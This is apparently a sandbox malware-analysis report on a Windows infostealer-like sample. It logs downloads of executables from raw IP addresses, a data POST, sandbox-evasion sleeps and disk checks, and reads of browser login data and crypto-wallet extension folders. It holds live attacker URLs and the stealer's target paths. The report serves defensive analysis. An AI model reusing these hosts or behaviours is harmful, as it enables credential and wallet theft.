registers.edi: 5223128 registers.eax: 1637640 registers.ebp: 1637656 registers.edx: 44 registers.ebx: 0 registers.esi: 44 registers.ecx: 0	1
__exception__ July 20, 2024, 8:08 p.m.	stacktrace: _pe7ouzepdg8dqq0bonzyfkx+0x3dd1a @ 0x43dd1a _pe7ouzepdg8dqq0bonzyfkx+0x3d12b @ 0x43d12b _pe7ouzepdg8dqq0bonzyfkx+0x8f668 @ 0x48f668 _pe7ouzepdg8dqq0bonzyfkx+0x7b9a6 @ 0x47b9a6 _pe7ouzepdg8dqq0bonzyfkx+0x933f1 @ 0x4933f1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: f7 37 89 06 e9 dd 07 00 00 8b 06 33 d2 8a 17 8b exception.symbol: _pe7ouzepdg8dqq0bonzyfkx+0x3b00f exception.instruction: div dword ptr [edi] exception.module: _pE7OUzePdg8dQq0bonZyFkX.tmp exception.exception_code: 0xc0000094 exception.offset: 241679 exception.address: 0x43b00f registers.esp: 1637784 registers.edi: 5229584 registers.eax: 7322046 registers.ebp: 1637864 registers.edx: 0 registers.ebx: 1 registers.esi: 5229576 registers.ecx: 5229584	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (21 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://91.103.252.177/api/crazyfish.php
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://91.103.252.177/api/twofish.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://79.137.192.13/prog/669a659129ee2_crypted.exe#1
suspicious_features	Connection to IP address	suspicious_request	HEAD http://79.137.192.13/prog/669b5b78252ea_googlesoft.exe#mene
suspicious_features	Connection to IP address	suspicious_request	HEAD http://77.105.133.27/download/th/space.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://77.105.133.27/download/123p.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://176.111.174.109/psyzh
suspicious_features	Connection to IP address	suspicious_request	HEAD http://94.232.45.38/eee01/eee01.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://89.111.172.64/d/385132
suspicious_features	Connection to IP address	suspicious_request	HEAD http://79.137.192.13/prog/6692518842cd4_BotClient.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://79.137.192.13/prog/6696621cecc83_crypted.exe#xin
suspicious_features	Connection to IP address	suspicious_request	GET http://79.137.192.13/prog/669a659129ee2_crypted.exe#1
suspicious_features	Connection to IP address	suspicious_request	GET http://79.137.192.13/prog/669b5b78252ea_googlesoft.exe#mene
suspicious_features	Connection to IP address	suspicious_request	GET http://77.105.133.27/download/th/space.php
suspicious_features	Connection to IP address	suspicious_request	GET http://77.105.133.27/download/123p.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://94.232.45.38/eee01/eee01.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://176.111.174.109/psyzh
suspicious_features	Connection to IP address	suspicious_request	GET http://89.111.172.64/d/385132
suspicious_features	Connection to IP address	suspicious_request	GET http://79.137.192.13/prog/6692518842cd4_BotClient.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://79.137.192.13/prog/6696621cecc83_crypted.exe#xin
suspicious_features	GET method with no useragent header	suspicious_request	GET https://steamcommunity.com/profiles/76561199743486170

Performs some HTTP requests (24 events)

request	GET http://91.103.252.177/api/crazyfish.php
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	POST http://91.103.252.177/api/twofish.php
request	HEAD http://79.137.192.13/prog/669a659129ee2_crypted.exe#1
request	HEAD http://79.137.192.13/prog/669b5b78252ea_googlesoft.exe#mene
request	HEAD http://77.105.133.27/download/th/space.php
request	HEAD http://77.105.133.27/download/123p.exe
request	HEAD http://176.111.174.109/psyzh
request	HEAD http://94.232.45.38/eee01/eee01.exe
request	HEAD http://89.111.172.64/d/385132
request	HEAD http://79.137.192.13/prog/6692518842cd4_BotClient.exe
request	HEAD http://79.137.192.13/prog/6696621cecc83_crypted.exe#xin
request	GET http://79.137.192.13/prog/669a659129ee2_crypted.exe#1
request	GET http://79.137.192.13/prog/669b5b78252ea_googlesoft.exe#mene
request	GET http://77.105.133.27/download/th/space.php
request	GET http://77.105.133.27/download/123p.exe
request	GET http://94.232.45.38/eee01/eee01.exe
request	GET http://176.111.174.109/psyzh
request	GET http://89.111.172.64/d/385132
request	GET http://79.137.192.13/prog/6692518842cd4_BotClient.exe
request	GET http://79.137.192.13/prog/6696621cecc83_crypted.exe#xin
request	GET https://db-ip.com/demo/home.php?s=
request	GET https://iplogger.org/1nhuM4.js
request	GET https://steamcommunity.com/profiles/76561199743486170

Sends data using the HTTP POST Method (1 event)

request

POST http://91.103.252.177/api/twofish.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1951 events)

Time & API	Arguments	Return
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d82810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d83810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d84810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d85810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d86810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d87810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d88810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d89810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8a810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8b810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8c810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8d810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8e810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8f810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d90810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d91810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d92810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d93810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d94810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d95810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d96810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d97810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d98810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d99810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9a810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9b810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9c810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9d810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9e810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9f810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da0810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da1810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da2810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da3810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da4810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da5810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da6810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da7810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da8810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da9810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076daa810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dab810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dac810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dad810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dae810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076daf810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076db0810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076db1810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory July 20, 2024, 8:07 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076db2810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800

A process attempted to delay the analysis task. (1 event)

description

AppGate018ver1.exe tried to sleep 266 seconds, actually delayed analysis time by 266 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (11 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW July 20, 2024, 8:07 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13284749312 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW July 20, 2024, 8:08 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13284311040 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW July 20, 2024, 8:08 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13279879168 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW July 20, 2024, 8:08 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13279064064 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW July 20, 2024, 8:08 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13273612288 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW July 20, 2024, 8:08 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13267730432 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW July 20, 2024, 8:08 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13262467072 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
DeviceIoControl July 20, 2024, 8:08 p.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000000d4 output_buffer:	1	1
DeviceIoControl July 20, 2024, 8:08 p.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000000d4 output_buffer:	1	1
DeviceIoControl July 20, 2024, 8:08 p.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000000d4 output_buffer:	1	1
DeviceIoControl July 20, 2024, 8:08 p.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000000d4 output_buffer:	1	1

Steals private information from local Internet browsers (21 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghpilmjholiicaobfjdkefcogmgaabif
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (23 events)

file	C:\Users\test22\AppData\Local\Temp\is-8FLUV.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\DJ7nOnOZOm[1].exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\eee01[1].exe
file	C:\Users\test22\AppData\Local\Sound Changer Beta\soundchangerbeta32.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\publicsoft[1].exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\crt[1].exe
file	C:\Users\test22\Documents\SimpleAdobe\D_Lr3ok7w7oLDH8Q70lFMUK9.exe
file	C:\Users\test22\Documents\SimpleAdobe\EN4TCgpUszKEwT9miRPGOajK.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\669b5b78252ea_googlesoft[1].exe
